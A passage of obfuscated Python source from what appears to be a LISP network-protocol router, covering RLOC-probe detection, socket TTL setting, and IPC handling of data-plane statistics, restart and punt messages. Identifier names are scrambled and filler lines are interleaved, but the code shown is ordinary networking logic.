if 84 - 84: OOooOOo . ooOoO0o % iIii1I11I1II1
if 52 - 52: I1IiiI / OoO0O00 + OoOoOO00
if 94 - 94: OoooooooOO + O0 * iIii1I11I1II1 * II111iiii
if 90 - 90: I11i + O0 / I1IiiI . oO0o / O0
for IIIii in lisp_nat_state_info . values ( ) :
for oO0ooo in IIIii :
if ( addr == oO0ooo . address ) : return ( O0IiIIiI1111iI )
if 46 - 46: O0 . O0 - oO0o . II111iiii * I1IiiI * Ii1I
if 10 - 10: i1IIi + i1IIi . i1IIi - I1IiiI - I1IiiI
return ( addr )
if 26 - 26: Ii1I * I11i / I11i
return ( O0IiIIiI1111iI )
if 79 - 79: ooOoO0o / oO0o - oO0o / OoooooooOO
if 91 - 91: iIii1I11I1II1 - O0 * o0oOOo0O0Ooo * o0oOOo0O0Ooo . II111iiii
if 69 - 69: II111iiii - Oo0Ooo + i1IIi . II111iiii + o0oOOo0O0Ooo
if 20 - 20: OoooooooOO - OoO0O00 * ooOoO0o * OoOoOO00 / OOooOOo
if 64 - 64: O0 + iII111i / I11i * OoOoOO00 + o0oOOo0O0Ooo + I1Ii111
if 16 - 16: I11i
if 9 - 9: Ii1I / IiII * I11i - i11iIiiIii * I1ii11iIi11i / iII111i
def lisp_set_ttl ( lisp_socket , ttl ) :
try :
lisp_socket . setsockopt ( socket . SOL_IP , socket . IP_TTL , ttl )
lisp_socket . setsockopt ( socket . SOL_IP , socket . IP_MULTICAST_TTL , ttl )
except :
lprint ( "socket.setsockopt(IP_TTL) not supported" )
pass
if 61 - 61: O0 % iII111i
return
if 41 - 41: I1Ii111 * OoooooooOO
if 76 - 76: OoooooooOO * II111iiii . II111iiii / o0oOOo0O0Ooo - iII111i
if 49 - 49: O0 . I1ii11iIi11i . OoOoOO00 . I1Ii111 % O0 . iIii1I11I1II1
if 19 - 19: iIii1I11I1II1
if 97 - 97: Ii1I . I11i / ooOoO0o + Oo0Ooo
if 100 - 100: iII111i / I1Ii111 % OoOoOO00 . O0 / OoOoOO00
if 81 - 81: OoO0O00 % i11iIiiIii / OoO0O00 + ooOoO0o
def lisp_is_rloc_probe_request ( lisp_type ) :
lisp_type = struct . unpack ( "B" , lisp_type ) [ 0 ]
return ( lisp_type == 0x12 )
if 100 - 100: O0 . Oo0Ooo % Oo0Ooo % O0 / i11iIiiIii
if 56 - 56: IiII - OOooOOo - OoOoOO00 - I11i
if 57 - 57: i1IIi
if 41 - 41: I11i / Ii1I
if 1 - 1: II111iiii / iII111i
if 83 - 83: OoO0O00 / iII111i
if 59 - 59: I1Ii111 % OOooOOo . I1IiiI + I1ii11iIi11i % oO0o
def lisp_is_rloc_probe_reply ( lisp_type ) :
lisp_type = struct . unpack ( "B" , lisp_type ) [ 0 ]
return ( lisp_type == 0x28 )
if 96 - 96: OoO0O00
if 53 - 53: oO0o + OoO0O00
if 58 - 58: iIii1I11I1II1 + OoOoOO00
if 65 - 65: iII111i % Oo0Ooo * iIii1I11I1II1 + I1IiiI + II111iiii
if 72 - 72: OoOoOO00 . OoooooooOO - OOooOOo
if 15 - 15: OoOoOO00
if 13 - 13: I1ii11iIi11i - OOooOOo - i11iIiiIii / IiII
if 65 - 65: IiII
if 76 - 76: I1Ii111 % I1ii11iIi11i + ooOoO0o / I1IiiI
if 59 - 59: OOooOOo - o0oOOo0O0Ooo - o0oOOo0O0Ooo % I1IiiI
if 55 - 55: o0oOOo0O0Ooo % I1ii11iIi11i - IiII + OoooooooOO
if 44 - 44: iII111i * I1Ii111 - I1IiiI % i1IIi
if 35 - 35: iII111i . OoOoOO00 + i1IIi . I1Ii111 - oO0o
if 92 - 92: o0oOOo0O0Ooo
if 8 - 8: i1IIi / IiII . O0
if 72 - 72: OOooOOo
if 20 - 20: i11iIiiIii + Oo0Ooo * Oo0Ooo % OOooOOo
if 66 - 66: I1ii11iIi11i + iII111i / Ii1I / I1IiiI * i11iIiiIii
if 41 - 41: Ii1I / Oo0Ooo . OoO0O00 . iIii1I11I1II1 % IiII . I11i
def lisp_is_rloc_probe ( packet , rr ) :
oOoO0OOO00O = ( struct . unpack ( "B" , packet [ 9 ] ) [ 0 ] == 17 )
if ( oOoO0OOO00O == False ) : return ( [ packet , None , None , None ] )
if 59 - 59: O0 + II111iiii + IiII % Oo0Ooo
oo0O = struct . unpack ( "H" , packet [ 20 : 22 ] ) [ 0 ]
O0o0o0ooO0ooo = struct . unpack ( "H" , packet [ 22 : 24 ] ) [ 0 ]
o0O0OOOoo = ( socket . htons ( LISP_CTRL_PORT ) in [ oo0O , O0o0o0ooO0ooo ] )
if ( o0O0OOOoo == False ) : return ( [ packet , None , None , None ] )
if 37 - 37: I1Ii111 * OoOoOO00 % IiII % iII111i
if ( rr == 0 ) :
oO0oo000O = lisp_is_rloc_probe_request ( packet [ 28 ] )
if ( oO0oo000O == False ) : return ( [ packet , None , None , None ] )
elif ( rr == 1 ) :
oO0oo000O = lisp_is_rloc_probe_reply ( packet [ 28 ] )
if ( oO0oo000O == False ) : return ( [ packet , None , None , None ] )
elif ( rr == - 1 ) :
oO0oo000O = lisp_is_rloc_probe_request ( packet [ 28 ] )
if ( oO0oo000O == False ) :
oO0oo000O = lisp_is_rloc_probe_reply ( packet [ 28 ] )
if ( oO0oo000O == False ) : return ( [ packet , None , None , None ] )
if 24 - 24: OOooOOo - OoooooooOO * OoOoOO00 % I1Ii111
if 57 - 57: I1Ii111
if 7 - 7: iII111i . i11iIiiIii
if 13 - 13: Ii1I % I1IiiI * IiII % OoO0O00 - ooOoO0o
if 98 - 98: i11iIiiIii / I1ii11iIi11i % OOooOOo / I1Ii111 + oO0o + iIii1I11I1II1
if 100 - 100: OoO0O00 . ooOoO0o
iI1Iii1i1 = lisp_address ( LISP_AFI_IPV4 , "" , 32 , 0 )
iI1Iii1i1 . address = socket . ntohl ( struct . unpack ( "I" , packet [ 12 : 16 ] ) [ 0 ] )
if 17 - 17: I1Ii111 * OoooooooOO
if 33 - 33: O0 / Oo0Ooo * I1IiiI / ooOoO0o
if 33 - 33: Ii1I
if 20 - 20: Ii1I + I11i
if ( iI1Iii1i1 . is_local ( ) ) : return ( [ None , None , None , None ] )
if 98 - 98: OOooOOo
if 58 - 58: i11iIiiIii / OoOoOO00
if 18 - 18: ooOoO0o + O0 - OOooOOo + iIii1I11I1II1 . OOooOOo * iIii1I11I1II1
if 83 - 83: OoO0O00 - Oo0Ooo * I1IiiI % Oo0Ooo % oO0o
iI1Iii1i1 = iI1Iii1i1 . print_address_no_iid ( )
Oo0o = socket . ntohs ( struct . unpack ( "H" , packet [ 20 : 22 ] ) [ 0 ] )
Oo0o0 = struct . unpack ( "B" , packet [ 8 ] ) [ 0 ] - 1
packet = packet [ 28 : : ]
if 64 - 64: OoOoOO00 + oO0o / OoooooooOO . i11iIiiIii / II111iiii
I1I111iIiI = bold ( "Receive(pcap)" , False )
I1ii1ii = bold ( "from " + iI1Iii1i1 , False )
IiI1i1i1 = lisp_format_packet ( packet )
lprint ( "{} {} bytes {} {}, packet: {}" . format ( I1I111iIiI , len ( packet ) , I1ii1ii , Oo0o , IiI1i1i1 ) )
if 55 - 55: ooOoO0o . i11iIiiIii . o0oOOo0O0Ooo
return ( [ packet , iI1Iii1i1 , Oo0o , Oo0o0 ] )
if 52 - 52: IiII . oO0o + i11iIiiIii % IiII
if 45 - 45: i1IIi - I1IiiI / IiII - I1IiiI
if 21 - 21: IiII
if 43 - 43: IiII
if 9 - 9: OOooOOo * ooOoO0o + ooOoO0o . I1Ii111
if 8 - 8: IiII * iIii1I11I1II1
if 7 - 7: I1Ii111 / OoooooooOO % O0 - I1ii11iIi11i
if 49 - 49: OoooooooOO . I1ii11iIi11i / OoooooooOO * oO0o
if 81 - 81: I1ii11iIi11i . ooOoO0o + I1ii11iIi11i
if 84 - 84: OoooooooOO
if 95 - 95: o0oOOo0O0Ooo
def lisp_ipc_write_xtr_parameters ( cp , dp ) :
if ( lisp_ipc_dp_socket == None ) : return
if 22 - 22: ooOoO0o / o0oOOo0O0Ooo - OoooooooOO / Oo0Ooo - I1Ii111 / OOooOOo
oOOO0oo0 = { "type" : "xtr-parameters" , "control-plane-logging" : cp ,
"data-plane-logging" : dp , "rtr" : lisp_i_am_rtr }
if 41 - 41: oO0o . II111iiii
lisp_write_to_dp_socket ( oOOO0oo0 )
return
if 47 - 47: I1ii11iIi11i
if 5 - 5: Oo0Ooo
if 23 - 23: i11iIiiIii / I11i + i1IIi % I1Ii111
if 100 - 100: Oo0Ooo
if 13 - 13: I1IiiI + ooOoO0o * II111iiii
if 32 - 32: iIii1I11I1II1 + O0 + i1IIi
if 28 - 28: IiII + I11i
if 1 - 1: OoooooooOO - i11iIiiIii . OoooooooOO - o0oOOo0O0Ooo - OOooOOo * I1Ii111
def lisp_external_data_plane ( ) :
ooO0ooooO = 'egrep "ipc-data-plane = yes" ./lisp.config'
if ( commands . getoutput ( ooO0ooooO ) != "" ) : return ( True )
if 56 - 56: Ii1I . OoO0O00
if ( os . getenv ( "LISP_RUN_LISP_XTR" ) != None ) : return ( True )
return ( False )
if 43 - 43: iII111i * iII111i
if 31 - 31: O0 - iIii1I11I1II1 . I11i . oO0o
if 96 - 96: OoooooooOO * iIii1I11I1II1 * Oo0Ooo
if 76 - 76: OoO0O00 / i11iIiiIii % ooOoO0o % I11i * O0
if 84 - 84: II111iiii - iII111i / IiII . O0 % i1IIi / I1ii11iIi11i
if 2 - 2: OoooooooOO . OoO0O00 . II111iiii / Ii1I - OOooOOo % Oo0Ooo
if 47 - 47: OOooOOo * oO0o
if 41 - 41: OoooooooOO * I1IiiI
if 3 - 3: IiII
if 96 - 96: I11i - OOooOOo + I11i
if 71 - 71: Oo0Ooo
if 48 - 48: o0oOOo0O0Ooo / II111iiii / OoOoOO00 * o0oOOo0O0Ooo + I1IiiI . OoOoOO00
if 52 - 52: Ii1I / OoOoOO00 . OOooOOo * IiII . OoooooooOO
if 6 - 6: i1IIi . oO0o % IiII . Oo0Ooo % I11i
def lisp_process_data_plane_restart ( do_clear = False ) :
os . system ( "touch ./lisp.config" )
if 86 - 86: OoooooooOO + IiII % o0oOOo0O0Ooo . i1IIi . iII111i
I1III1I1i11i = { "type" : "entire-map-cache" , "entries" : [ ] }
if 54 - 54: I1Ii111 . IiII - o0oOOo0O0Ooo . iIii1I11I1II1
if ( do_clear == False ) :
Ii1Iii = I1III1I1i11i [ "entries" ]
lisp_map_cache . walk_cache ( lisp_ipc_walk_map_cache , Ii1Iii )
if 95 - 95: ooOoO0o + i1IIi / OOooOOo . i11iIiiIii
if 31 - 31: iII111i - iII111i - oO0o
lisp_write_to_dp_socket ( I1III1I1i11i )
return
if 62 - 62: Oo0Ooo % Oo0Ooo / OoooooooOO * o0oOOo0O0Ooo . Ii1I
if 1 - 1: I1ii11iIi11i / II111iiii / II111iiii + o0oOOo0O0Ooo + OoooooooOO
if 34 - 34: i11iIiiIii + iIii1I11I1II1 - i11iIiiIii * o0oOOo0O0Ooo - iII111i
if 87 - 87: OOooOOo * OoO0O00
if 61 - 61: iII111i - II111iiii . I1Ii111 % II111iiii / I11i
if 86 - 86: II111iiii
if 94 - 94: o0oOOo0O0Ooo % Ii1I * Ii1I % Oo0Ooo / I1ii11iIi11i
if 40 - 40: Oo0Ooo . II111iiii / II111iiii - i1IIi
if 91 - 91: Ii1I
if 45 - 45: I1ii11iIi11i + Oo0Ooo
if 72 - 72: I1ii11iIi11i
if 5 - 5: i1IIi
if 31 - 31: iII111i - OoooooooOO + oO0o / OoooooooOO + I1ii11iIi11i
if 93 - 93: o0oOOo0O0Ooo * I1ii11iIi11i % I1IiiI * ooOoO0o
def lisp_process_data_plane_stats ( msg , lisp_sockets , lisp_port ) :
if ( msg . has_key ( "entries" ) == False ) :
lprint ( "No 'entries' in stats IPC message" )
return
if 37 - 37: OoO0O00 * OoooooooOO / oO0o * I11i * I1ii11iIi11i
if ( type ( msg [ "entries" ] ) != list ) :
lprint ( "'entries' in stats IPC message must be an array" )
return
if 42 - 42: OoooooooOO - ooOoO0o . OOooOOo + OoOoOO00
if 53 - 53: o0oOOo0O0Ooo
for msg in msg [ "entries" ] :
if ( msg . has_key ( "eid-prefix" ) == False ) :
lprint ( "No 'eid-prefix' in stats IPC message" )
continue
if 55 - 55: ooOoO0o . i1IIi - ooOoO0o + O0 + I1IiiI
Ii1i1 = msg [ "eid-prefix" ]
if 31 - 31: OoO0O00 % I1Ii111
if ( msg . has_key ( "instance-id" ) == False ) :
lprint ( "No 'instance-id' in stats IPC message" )
continue
if 62 - 62: oO0o / O0 - I1Ii111 . IiII
IiIIi11i111 = int ( msg [ "instance-id" ] )
if 81 - 81: i11iIiiIii
if 57 - 57: O0
if 85 - 85: i11iIiiIii - i11iIiiIii - OoOoOO00 / II111iiii - II111iiii
if 4 - 4: I1ii11iIi11i * O0 / OoO0O00 * II111iiii . iIii1I11I1II1 / OOooOOo
iiI1I1IIi = lisp_address ( LISP_AFI_NONE , "" , 0 , IiIIi11i111 )
iiI1I1IIi . store_prefix ( Ii1i1 )
o0oO0o00 = lisp_map_cache_lookup ( None , iiI1I1IIi )
if ( o0oO0o00 == None ) :
lprint ( "Map-cache entry for {} not found for stats update" . format ( Ii1i1 ) )
if 97 - 97: i1IIi - OoOoOO00 . OoooooooOO
continue
if 24 - 24: iIii1I11I1II1 + OOooOOo * iII111i % IiII % OOooOOo
if 64 - 64: IiII . I1ii11iIi11i - o0oOOo0O0Ooo - ooOoO0o + OoooooooOO
if ( msg . has_key ( "rlocs" ) == False ) :
lprint ( "No 'rlocs' in stats IPC message for {}" . format ( Ii1i1 ) )
if 95 - 95: iII111i . I1ii11iIi11i + ooOoO0o + o0oOOo0O0Ooo % OoO0O00
continue
if 50 - 50: iII111i * O0 % II111iiii
if ( type ( msg [ "rlocs" ] ) != list ) :
lprint ( "'rlocs' in stats IPC message must be an array" )
continue
if 80 - 80: OOooOOo - II111iiii - OoO0O00
o00 = msg [ "rlocs" ]
if 1 - 1: ooOoO0o + i1IIi * I1ii11iIi11i % Ii1I . iII111i
if 78 - 78: II111iiii % I1Ii111 . I1ii11iIi11i
if 21 - 21: I1IiiI % OoOoOO00 * OoOoOO00 + Oo0Ooo
if 32 - 32: IiII . Oo0Ooo - I1IiiI % OoO0O00 % OoOoOO00
for Iioo0 in o00 :
if ( Iioo0 . has_key ( "rloc" ) == False ) : continue
if 98 - 98: II111iiii + i1IIi * oO0o % I1IiiI
O0ooo0Ooo = Iioo0 [ "rloc" ]
if ( O0ooo0Ooo == "no-address" ) : continue
if 53 - 53: i11iIiiIii . I1ii11iIi11i - OOooOOo - OOooOOo
I1II = lisp_address ( LISP_AFI_NONE , "" , 0 , 0 )
I1II . store_address ( O0ooo0Ooo )
if 97 - 97: I1IiiI % iII111i % OoooooooOO / ooOoO0o / i11iIiiIii
o0oO0O00 = o0oO0o00 . get_rloc ( I1II )
if ( o0oO0O00 == None ) : continue
if 7 - 7: O0 % IiII / o0oOOo0O0Ooo
if 79 - 79: IiII + I1Ii111
if 59 - 59: iII111i - oO0o . ooOoO0o / IiII * i11iIiiIii
if 61 - 61: I11i - Oo0Ooo * II111iiii + iIii1I11I1II1
IiiiiI1IiIi = 0 if Iioo0 . has_key ( "packet-count" ) == False else Iioo0 [ "packet-count" ]
if 73 - 73: OoOoOO00
I1i1iiI = 0 if Iioo0 . has_key ( "byte-count" ) == False else Iioo0 [ "byte-count" ]
if 44 - 44: Oo0Ooo / oO0o
i1 = 0 if Iioo0 . has_key ( "seconds-last-packet" ) == False else Iioo0 [ "seconds-last-packet" ]
if 9 - 9: i1IIi % I1IiiI + OoO0O00 * ooOoO0o / iIii1I11I1II1 / iII111i
if 80 - 80: OOooOOo / O0 % IiII * OoOoOO00
o0oO0O00 . stats . packet_count += IiiiiI1IiIi
o0oO0O00 . stats . byte_count += I1i1iiI
o0oO0O00 . stats . last_increment = lisp_get_timestamp ( ) - i1
if 53 - 53: OOooOOo + i11iIiiIii
lprint ( "Update stats {}/{}/{}s for {} RLOC {}" . format ( IiiiiI1IiIi , I1i1iiI ,
i1 , Ii1i1 , O0ooo0Ooo ) )
if 25 - 25: i11iIiiIii
if 51 - 51: iII111i . ooOoO0o
if 70 - 70: I11i / O0 - I11i + o0oOOo0O0Ooo . ooOoO0o . o0oOOo0O0Ooo
if 6 - 6: I11i + II111iiii - I1Ii111
if 45 - 45: i1IIi / iII111i + i11iIiiIii * I11i + ooOoO0o / OoooooooOO
if ( o0oO0o00 . group . is_null ( ) and o0oO0o00 . has_ttl_elapsed ( ) ) :
Ii1i1 = green ( o0oO0o00 . print_eid_tuple ( ) , False )
lprint ( "Refresh map-cache entry {}" . format ( Ii1i1 ) )
lisp_send_map_request ( lisp_sockets , lisp_port , None , o0oO0o00 . eid , None )
if 56 - 56: I11i + I1Ii111
if 80 - 80: II111iiii . Ii1I + o0oOOo0O0Ooo / II111iiii / OoO0O00 + iIii1I11I1II1
return
if 29 - 29: o0oOOo0O0Ooo + OoOoOO00 + ooOoO0o - I1ii11iIi11i
if 64 - 64: O0 / OoooooooOO
if 28 - 28: I1ii11iIi11i + oO0o . Oo0Ooo % iIii1I11I1II1 / I1Ii111
if 8 - 8: O0 . I1IiiI * o0oOOo0O0Ooo + I1IiiI
if 44 - 44: i1IIi % iII111i . i11iIiiIii / I11i + OoooooooOO
if 21 - 21: OoOoOO00 . OoO0O00 . OoOoOO00 + OoOoOO00
if 30 - 30: I1IiiI - iII111i - OOooOOo + oO0o
if 51 - 51: Ii1I % O0 / II111iiii . Oo0Ooo
if 90 - 90: i11iIiiIii * II111iiii % iIii1I11I1II1 . I1ii11iIi11i / Oo0Ooo . OOooOOo
if 77 - 77: OoO0O00
if 95 - 95: II111iiii
if 59 - 59: iIii1I11I1II1 % OOooOOo / OoOoOO00 * I1Ii111 * OoooooooOO * O0
if 43 - 43: OoO0O00 * I1IiiI * OOooOOo * O0 - O0 / o0oOOo0O0Ooo
if 77 - 77: I11i % I1Ii111 . IiII % OoooooooOO * o0oOOo0O0Ooo
if 87 - 87: iII111i + IiII / ooOoO0o * ooOoO0o * OOooOOo
if 97 - 97: I1Ii111
if 47 - 47: iII111i / I1ii11iIi11i - Ii1I . II111iiii
if 56 - 56: O0 - i1IIi % o0oOOo0O0Ooo + IiII
if 42 - 42: o0oOOo0O0Ooo . OOooOOo % I11i - OoOoOO00
if 38 - 38: OoooooooOO
if 27 - 27: O0 + I1ii11iIi11i % Ii1I . i1IIi + OoO0O00 + OoOoOO00
if 22 - 22: II111iiii / I1IiiI + o0oOOo0O0Ooo * I1IiiI . OoooooooOO * OOooOOo
if 49 - 49: I1ii11iIi11i * I1IiiI + OOooOOo + i11iIiiIii * I1ii11iIi11i . o0oOOo0O0Ooo
def lisp_process_data_plane_decap_stats ( msg , lisp_ipc_socket ) :
if 36 - 36: o0oOOo0O0Ooo - i11iIiiIii
if 37 - 37: O0 + IiII + I1IiiI
if 50 - 50: OoooooooOO . I1Ii111
if 100 - 100: ooOoO0o * ooOoO0o - Ii1I
if 13 - 13: iII111i . I11i * OoO0O00 . i1IIi . iIii1I11I1II1 - o0oOOo0O0Ooo
if ( lisp_i_am_itr ) :
lprint ( "Send decap-stats IPC message to lisp-etr process" )
oOOO0oo0 = "stats%{}" . format ( json . dumps ( msg ) )
oOOO0oo0 = lisp_command_ipc ( oOOO0oo0 , "lisp-itr" )
lisp_ipc ( oOOO0oo0 , lisp_ipc_socket , "lisp-etr" )
return
if 68 - 68: Ii1I % o0oOOo0O0Ooo / OoooooooOO + Ii1I - Ii1I
if 79 - 79: II111iiii / IiII
if 4 - 4: O0 - i11iIiiIii % ooOoO0o * O0 - ooOoO0o
if 96 - 96: oO0o % II111iiii . Ii1I % OoO0O00 . iIii1I11I1II1 / IiII
if 96 - 96: o0oOOo0O0Ooo / O0 . iIii1I11I1II1 . Ii1I % OOooOOo % II111iiii
if 5 - 5: OoooooooOO / I1Ii111 % I1Ii111 / I1IiiI
if 19 - 19: I1IiiI - ooOoO0o % IiII - o0oOOo0O0Ooo * OOooOOo + I1ii11iIi11i
if 44 - 44: i1IIi
oOOO0oo0 = bold ( "IPC" , False )
lprint ( "Process decap-stats {} message: '{}'" . format ( oOOO0oo0 , msg ) )
if 85 - 85: I1ii11iIi11i / IiII + oO0o
if ( lisp_i_am_etr ) : msg = json . loads ( msg )
if 95 - 95: IiII . OoO0O00
I1I1IIII11 = [ "good-packets" , "ICV-error" , "checksum-error" ,
"lisp-header-error" , "no-decrypt-key" , "bad-inner-version" ,
"outer-header-error" ]
if 76 - 76: I1Ii111
for ii1IiIII11 in I1I1IIII11 :
IiiiiI1IiIi = 0 if msg . has_key ( ii1IiIII11 ) == False else msg [ ii1IiIII11 ] [ "packet-count" ]
if 92 - 92: i11iIiiIii - II111iiii % I1Ii111
lisp_decap_stats [ ii1IiIII11 ] . packet_count += IiiiiI1IiIi
if 26 - 26: i11iIiiIii / II111iiii . I1ii11iIi11i
I1i1iiI = 0 if msg . has_key ( ii1IiIII11 ) == False else msg [ ii1IiIII11 ] [ "byte-count" ]
if 79 - 79: OoO0O00 / oO0o
lisp_decap_stats [ ii1IiIII11 ] . byte_count += I1i1iiI
if 23 - 23: OOooOOo * II111iiii + O0 . OoO0O00
i1 = 0 if msg . has_key ( ii1IiIII11 ) == False else msg [ ii1IiIII11 ] [ "seconds-last-packet" ]
if 80 - 80: IiII + OoO0O00
lisp_decap_stats [ ii1IiIII11 ] . last_increment = lisp_get_timestamp ( ) - i1
if 2 - 2: IiII + OoOoOO00 % oO0o
return
if 76 - 76: o0oOOo0O0Ooo
if 25 - 25: OoooooooOO
if 78 - 78: oO0o / i11iIiiIii * O0 / OOooOOo % i11iIiiIii % O0
if 86 - 86: IiII
if 26 - 26: IiII - I1Ii111 + i11iIiiIii % ooOoO0o * i11iIiiIii + Oo0Ooo
if 39 - 39: Ii1I - i1IIi + i11iIiiIii
if 21 - 21: IiII
if 76 - 76: o0oOOo0O0Ooo % Oo0Ooo + OoO0O00
if 36 - 36: OOooOOo . oO0o
if 15 - 15: I1IiiI + ooOoO0o - o0oOOo0O0Ooo
if 62 - 62: Ii1I - OOooOOo
if 88 - 88: iIii1I11I1II1 * Oo0Ooo / II111iiii / IiII / OoO0O00 % ooOoO0o
if 19 - 19: I11i * iII111i . O0 * iII111i % I1ii11iIi11i - OoOoOO00
if 68 - 68: I1Ii111 - OoO0O00 % Ii1I + i1IIi . ooOoO0o
if 36 - 36: oO0o * iIii1I11I1II1 - O0 - IiII * O0 + i11iIiiIii
if 76 - 76: OoO0O00 % O0 / Ii1I + I1IiiI
if 23 - 23: I1IiiI % IiII . o0oOOo0O0Ooo
def lisp_process_punt ( punt_socket , lisp_send_sockets , lisp_ephem_port ) :
iI1iiiiii , iI1Iii1i1 = punt_socket . recvfrom ( 4000 )
if 82 - 82: o0oOOo0O0Ooo / ooOoO0o . I1IiiI + ooOoO0o
ii1Ii1i1ii = json . loads ( iI1iiiiii )
if ( type ( ii1Ii1i1ii ) != dict ) :
lprint ( "Invalid punt message from {}, not in JSON format" . format ( iI1Iii1i1 ) )
if 71 - 71: oO0o + ooOoO0o
return
if 87 - 87: ooOoO0o % oO0o
i1I11iiiI = bold ( "Punt" , False )
lprint ( "{} message from '{}': '{}'" . format ( i1I11iiiI , iI1Iii1i1 , ii1Ii1i1ii ) )
if 40 - 40: oO0o - I11i * i1IIi % oO0o / iIii1I11I1II1 % OoOoOO00
if ( ii1Ii1i1ii . has_key ( "type" ) == False ) :
lprint ( "Punt IPC message has no 'type' key" )
return
if 68 - 68: OOooOOo
if 99 - 99: OoooooooOO
if 2 - 2: Oo0Ooo + iIii1I11I1II1 - II111iiii % OoOoOO00 / i11iIiiIii
if 6 - 6: oO0o + iII111i * i1IIi * i11iIiiIii
if 10 - 10: IiII / i1IIi . OoOoOO00 . Oo0Ooo
if ( ii1Ii1i1ii [ "type" ] == "statistics" ) :
lisp_process_data_plane_stats ( ii1Ii1i1ii , lisp_send_sockets , lisp_ephem_port )
return
if 21 - 21: oO0o
if ( ii1Ii1i1ii [ "type" ] == "decap-statistics" ) :
lisp_process_data_plane_decap_stats ( ii1Ii1i1ii , punt_socket )
return
if 41 - 41: oO0o . O0 * Oo0Ooo - o0oOOo0O0Ooo * ooOoO0o + OoOoOO00
if 40 - 40: I1Ii111
if 58 - 58: oO0o . OoO0O00 / ooOoO0o
if 61 - 61: I11i + I1Ii111
if 27 - 27: ooOoO0o / i1IIi . oO0o - OoooooooOO
if ( ii1Ii1i1ii [ "type" ] == "restart" ) :
lisp_process_data_plane_restart ( )
return
if 48 - 48: ooOoO0o % ooOoO0o / OoooooooOO + i1IIi * oO0o + ooOoO0o
if 69 - 69: iII111i . iII111i
if 46 - 46: IiII * Oo0Ooo + I1Ii111
if 79 - 79: IiII
if 89 - 89: IiII * I11i + I1ii11iIi11i * oO0o - II111iiii
if ( ii1Ii1i1ii [ "type" ] != "discovery" ) :
lprint ( "Punt IPC message has wrong format" )
return
if 58 - 58: ooOoO0o . I1Ii111 / i1IIi % I1ii11iIi11i + o0oOOo0O0Ooo
if ( ii1Ii1i1ii . has_key ( "interface" ) == False ) :
lprint ( "Invalid punt message from {}, required keys missing" . format ( iI1Iii1i1 ) )
if 94 - 94: i11iIiiIii + I1Ii111 . iII111i - ooOoO0o % I1Ii111
return
if 94 - 94: i11iIiiIii - OOooOOo - O0 * OoooooooOO - ooOoO0o
if 35 - 35: iII111i . i11iIiiIii - OOooOOo % Oo0Ooo + Ii1I . iIii1I11I1II1
if 91 - 91: o0oOOo0O0Ooo / OoO0O00 + I1IiiI % i11iIiiIii % i1IIi
if 22 - 22: I1Ii111 * O0 % OoO0O00 * I1ii11iIi11i
if 47 - 47: OoO0O00 / OOooOOo / OoOoOO00 % i11iIiiIii / OoOoOO00
OoO0o0OOOO = ii1Ii1i1ii [ "interface" ]
if ( OoO0o0OOOO == "" ) :
IiIIi11i111 = int ( ii1Ii1i1ii [ "instance-id" ] )
if ( IiIIi11i111 == - 1 ) : return
else :
IiIIi11i111 = lisp_get_interface_instance_id ( OoO0o0OOOO , None )
if 52 - 52: ooOoO0o / I11i % i11iIiiIii - I1Ii111 % ooOoO0o - o0oOOo0O0Ooo
if 67 - 67: OoOoOO00 / I1Ii111 + i11iIiiIii - IiII
if 79 - 79: I11i . I11i - OoOoOO00
if 86 - 86: OoO0O00 * Oo0Ooo . iIii1I11I1II1 * O0
if 52 - 52: iII111i - i11iIiiIii + o0oOOo0O0Ooo + i1IIi
i1I1I = None
if ( ii1Ii1i1ii . has_key ( "source-eid" ) ) :
i1i1Ii1iiII1I = ii1Ii1i1ii [ "source-eid" ]
i1I1I = lisp_address ( LISP_AFI_NONE , i1i1Ii1iiII1I , 0 , IiIIi11i111 )
if ( i1I1I . is_null ( ) ) :
lprint ( "Invalid source-EID format '{}'" . format ( i1i1Ii1iiII1I ) )
return
if 58 - 58: OOooOOo - Ii1I * I1Ii111 - O0 . oO0o
if 72 - 72: i1IIi * iII111i * Ii1I / o0oOOo0O0Ooo . I1Ii111 + i11iIiiIii
OO0ooOo0ooooo = None
if ( ii1Ii1i1ii . has_key ( "dest-eid" ) ) :
I11IIII = ii1Ii1i1ii [ "dest-eid" ]
OO0ooOo0ooooo = lisp_address ( LISP_AFI_NONE , I11IIII , 0 , IiIIi11i111 )
if ( OO0ooOo0ooooo . is_null ( ) ) :
lprint ( "Invalid dest-EID format '{}'" . format ( I11IIII ) )
return
if 25 - 25: IiII + i11iIiiIii . O0
if 94 - 94: OoooooooOO + iII111i * OoooooooOO / o0oOOo0O0Ooo
if 12 - 12: iIii1I11I1II1 / iIii1I11I1II1 / II111iiii
if 93 - 93: oO0o
if 53 - 53: OoO0O00 * i1IIi / Oo0Ooo / OoO0O00 * ooOoO0o
if 77 - 77: iIii1I11I1II1 % I1IiiI + o0oOOo0O0Ooo + I1Ii111 * Oo0Ooo * i1IIi
if 14 - 14: iIii1I11I1II1 * iIii1I11I1II1 - OOooOOo . iII111i / ooOoO0o
if 54 - 54: OoOoOO00 - I1IiiI - iII111i
if ( i1I1I ) :
iIIi1iI1I1IIi = green ( i1I1I . print_address ( ) , False )
Oooo00oo = lisp_db_for_lookups . lookup_cache ( i1I1I , False )
if ( Oooo00oo != None ) :
if 49 - 49: i11iIiiIii * Oo0Ooo
if 100 - 100: Oo0Ooo * oO0o
if 85 - 85: OoooooooOO . IiII / IiII . ooOoO0o . IiII % II111iiii
if 65 - 65: oO0o - OoO0O00 / iII111i + ooOoO0o
if 80 - 80: o0oOOo0O0Ooo + II111iiii * Ii1I % OoOoOO00 % I1IiiI + I1ii11iIi11i
if ( Oooo00oo . dynamic_eid_configured ( ) ) :
II1i = lisp_allow_dynamic_eid ( OoO0o0OOOO , i1I1I )
if ( II1i != None and lisp_i_am_itr ) :
lisp_itr_discover_eid ( Oooo00oo , i1I1I , OoO0o0OOOO , II1i )
else :
lprint ( ( "Disallow dynamic source-EID {} " + "on interface {}" ) . format ( iIIi1iI1I1IIi , OoO0o0OOOO ) )
if 46 - 46: Oo0Ooo / Oo0Ooo % iII111i % I1IiiI
if 85 - 85: OoO0O00 - Ii1I / O0
if 45 - 45: IiII + I1Ii111 / I11i
else :
lprint ( "Punt from non-EID source {}" . format ( iIIi1iI1I1IIi ) )
if 84 - 84: iII111i % II111iiii
if 86 - 86: IiII % II111iiii / i1IIi * I1ii11iIi11i - O0 * OOooOOo
if 53 - 53: OOooOOo * oO0o + i1IIi % Oo0Ooo + II111iiii
if 34 - 34: oO0o % iII111i / IiII . IiII + i11iIiiIii
if 68 - 68: O0 % oO0o * IiII % O0
if 55 - 55: O0 % I1IiiI % O0
if ( OO0ooOo0ooooo ) :
